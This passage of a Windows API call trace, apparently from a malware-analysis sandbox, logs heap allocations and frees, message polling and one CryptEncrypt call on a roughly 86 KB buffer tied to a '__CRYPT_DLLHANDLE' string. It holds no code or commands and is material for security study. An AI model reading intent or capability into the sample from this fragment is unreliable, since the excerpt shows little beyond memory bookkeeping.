dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0248.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0248.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0248.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0248.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.494] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0248.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0248.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0248.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0248.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0248.496] CharLowerBuffW (in: lpsz="byte[86824]", cchLength=0xb | out: lpsz="byte[86824]") returned 0xb [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0248.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0248.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0248.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0248.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0248.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0248.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.502] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.502] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.505] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0248.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0248.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0248.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51928 [0248.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51928, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0248.506] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e94650*, pdwDataLen=0x8cef60*=0x15327, dwBufLen=0x15328 | out: pbData=0x2e94650*, pdwDataLen=0x8cef60*=0x15328) returned 1 [0248.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0248.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0248.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0248.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0248.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0248.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0248.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0248.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0248.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0248.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0248.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0248.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0248.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0248.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0248.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0248.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0248.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0248.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0248.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0248.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0248.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0248.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0248.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0248.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0248.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0248.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0248.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0248.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0248.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0248.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0248.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0248.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0248.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0248.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0248.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0248.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0248.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0248.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0248.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0248.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0248.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0248.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0248.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0248.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0248.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.516] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0248.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0248.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0248.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0248.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0248.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0248.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 